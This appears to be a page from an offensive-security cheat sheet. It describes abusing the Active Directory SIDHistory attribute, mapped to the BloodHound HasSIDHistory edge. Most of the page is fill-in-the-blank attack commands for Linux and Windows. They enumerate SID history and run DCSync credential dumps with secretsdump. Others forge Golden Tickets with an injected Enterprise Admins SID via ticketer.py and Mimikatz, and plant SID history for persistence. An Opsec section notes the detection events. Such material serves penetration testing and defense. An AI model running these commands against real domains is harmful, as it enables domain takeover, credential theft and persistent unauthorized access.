🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / HasSIDHistory

HasSIDHistory

Source principal's SIDHistory attribute contains the SID of the target principal β€” Kerberos tickets for the source will include the target's SID, granting equivalent access rights.

Applies to: User/Computer β†’ User/Group/Domain

If SID history contains a Domain Admins or Enterprise Admins SID (or the target domain's SID), the source principal effectively has those privileges in Kerberos-authenticated contexts. Exploitation depends on whether SID filtering is enabled on the trust.

Linux Abuse

Enumerate SID history

# bloodyAD
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<source-user>' \
  --attr sIDHistory

# ldapsearch
ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
  -b 'DC=<domain>,DC=<tld>' '(sAMAccountName=<source-user>)' sIDHistory

# NetExec
netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> \
  --get-sid-history

Authenticate as source principal and access target's resources

# If source user has SID history of DA/EA β€” authenticate normally, Kerberos includes the privileged SID
getTGT.py '<domain>/<source-user>:<password>'
export KRB5CCNAME=<source-user>.ccache

# DCSync if SID history contains replication rights SID
secretsdump.py -k -no-pass -dc-ip <dc-ip> '<domain>/<source-user>@<dc-hostname>'

# Access DA-protected resources
wmiexec.py -k -no-pass '<domain>/<source-user>@<target-computer>.<domain>'
smbexec.py -k -no-pass '<domain>/<source-user>@<target-computer>.<domain>'

Cross-domain SID history (inter-forest/trust)

# If trust has SID filtering disabled β€” SID history crosses trust boundary
# Authenticate to child domain with source user, access parent domain resources
export KRB5CCNAME=<child-domain-user>.ccache
secretsdump.py -k -no-pass -dc-ip <parent-dc-ip> '<parent-domain>/<source-user>@<parent-dc-hostname>'

Golden Ticket with injected SID history (post-DCSync)

# Inject target domain's Enterprise Admins SID into forged ticket
# Requires krbtgt hash of issuing domain
lookupsid.py '<domain>/<username>:<password>@<dc-ip>' 0  # get domain SID

ticketer.py -nthash '<krbtgt-ntlm-hash>' \
  -domain-sid '<source-domain-sid>' \
  -domain '<source-domain>' \
  -extra-sid '<target-domain-sid>-519' \
  'Administrator'

export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass '<target-domain>/Administrator@<target-dc-hostname>'

Windows Abuse

Verify SID history on an object

Get-ADUser <source-user> -Properties SIDHistory | Select-Object SIDHistory
Get-DomainUser <source-user> -Properties sidhistory

Authenticate and access resources (SID history in PAC is transparent)

# Run as source user β€” access is granted via SID history automatically in Kerberos PAC
runas /user:<domain>\<source-user> cmd.exe

# Access target domain resources if SID history contains cross-domain privileged SID
ls \\<target-dc>.<target-domain>\c$

Mimikatz β€” inject SID history into Golden Ticket

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt

mimikatz # kerberos::golden /user:Administrator /domain:<source-domain> /sid:<source-domain-sid> \
  /krbtgt:<krbtgt-ntlm-hash> /sids:<target-domain-sid>-519 /ptt

Add SID history to an account (requires DA + specific conditions)

# Pre-Windows 2016 (requires Mimikatz with lsass patch)
mimikatz # privilege::debug
mimikatz # sid::patch
mimikatz # sid::add /sam:<attacker-user> /new:<target-sid>

# Windows 2016+ (requires stopping NTDS, DSInternals)
Stop-Service NTDS -Force
Add-ADDBSidHistory -SamAccountName <attacker-user> -SidHistory '<target-sid>' `
  -DBPath 'C:\Windows\NTDS\ntds.dit' -Force
Start-Service NTDS

Opsec

  • SID history abuse is transparent β€” source user authenticates normally, privileged SID is in PAC automatically
  • Cross-domain SID history is blocked by SID filtering (enabled by default on external trusts, disabled on child/parent trusts within same forest)
  • Adding SID history (persistence) requires stopping NTDS service β€” generates Event ID 7036 (service stop)
  • Golden Ticket with ExtraSids: Event ID 4769 with unusual SID in PAC β€” advanced SIEM rules may catch this
  • Intra-forest trusts (parent/child): SID filtering disabled by default β€” full exploitation path without filtering bypass
  • Inter-forest trusts: SID filtering enabled by default β€” ExtraSids attack blocked unless filtering explicitly disabled